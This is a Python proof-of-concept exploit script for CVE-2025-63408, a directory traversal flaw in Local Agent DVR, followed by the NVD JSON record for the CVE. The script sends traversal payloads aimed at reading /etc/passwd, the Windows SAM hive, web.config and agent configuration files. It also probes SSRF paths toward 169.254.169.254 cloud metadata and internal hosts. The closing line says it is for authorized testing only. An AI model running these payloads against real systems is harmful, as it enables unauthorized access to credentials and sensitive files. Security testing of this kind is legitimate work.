CVE-2025-63408

# CVE-2025-63408 PoC - Local Agent DVR Directory Traversal # Vulnerability: Unauthenticated directory traversal in Local Agent DVR <= 6.6.1.0 # CVSS 7.8 (High) - Local attack vector with low privileges required import requests import urllib.parse import sys TARGET_HOST = "http://target-agent-dvr.local" def test_directory_traversal(): """Test for directory traversal vulnerability in Local Agent DVR""" # Common sensitive files to check on Linux systems linux_files = [ "../../../../etc/passwd", "..%2F..%2F..%2F..%2Fetc%2Fpasswd", "....//....//....//....//etc/passwd", "..\..\..\..\etc\passwd", "..%5C..%5C..%5C..%5Cetc%5Cpasswd" ] # Common sensitive files for Windows systems windows_files = [ "..\..\..\..\windows\win.ini", "..%5C..%5C..%5C..%5Cwindows%5Cwin.ini", "..\..\..\..\Windows\System32\drivers\etc\hosts", "..\..\..\..\ProgramData\Application Data\*", "..\..\..\..\inetpub\wwwroot\web.config" ] print(f"[*] Testing Local Agent DVR directory traversal vulnerability") print(f"[*] Target: {TARGET_HOST}") print("-" * 60) # Test Agent DVR specific paths agent_dvr_paths = [ "/api/files?path=../../../../etc/passwd", "/files/..%2F..%2F..%2F..%2Fetc/passwd", "/download?file=../../../../etc/passwd", "/storage/..%2F..%2F..%2F..%2Fconfig/agent.config", "/logs/..\..\..\..\windows\System32\config\sam" ] for path in agent_dvr_paths: try: url = f"{TARGET_HOST}{path}" print(f"[*] Testing: {url}") response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: content = response.text if "root:" in content or "[extensions]" in content or "<?xml" in content: print(f"[+] VULNERABLE! Successfully accessed: {path}") print(f"[+] Content preview:\n{content[:500]}") return True elif response.status_code in [403, 404]: print(f"[-] Access blocked or not found: {path}") else: print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {path}: {e}") # Also try basic traversal for traversal in linux_files + windows_files: try: encoded = urllib.parse.quote(traversal) url = f"{TARGET_HOST}/files/{encoded}" print(f"[*] Testing basic traversal: {encoded}") response = requests.get(url, timeout=10, verify=False) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Potential access via: {traversal}") except Exception as e: print(f"[!] Error: {e}") print("-" * 60) print("[*] Testing complete. If vulnerable, sensitive files may be exposed.") print("[*] Next steps: Check for SSRF or RCE via command injection paths") return False def test_ssrf(): """Test for SSRF via directory traversal""" ssrf_targets = [ "/api/http?url=http://localhost:22", "/api/fetch?target=http://169.254.169.254/latest/meta-data/", "/proxy/..%2F..%2Fhttp://internal-server/admin" ] print("\n[*] Testing SSRF via traversal...") for target in ssrf_targets: try: url = f"{TARGET_HOST}{target}" response = requests.get(url, timeout=10, verify=False) print(f"[*] SSRF test: {target} - Status: {response.status_code}") except: pass if __name__ == "__main__": test_directory_traversal() test_ssrf() print("\n[!] Note: This PoC is for authorized security testing only!")

{"cve": {"id": "CVE-2025-63408", "sourceIdentifier": "[email protected]", "published": "2025-11-18T16:15:45.323", "lastModified": "2025-12-31T02:25:54.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Local Agent DVR versions thru 6.6.1.0 are vulnerable to directory traversal that allows an unauthenticated local attacker to gain access to sensitive information, cause a server-side forgery request (SSRF), or execute OS commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ispyconnect:agent_dvr:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.6.7.0", "matchCriteriaId": "7476F171-5953-4AF8-98B3-C6C3CC11FD58"}]}]}], "references": [{"url": "https://ispysoftware.github.io/Agent_API/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.ericholub.com/blog/agent-dvr-rce/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}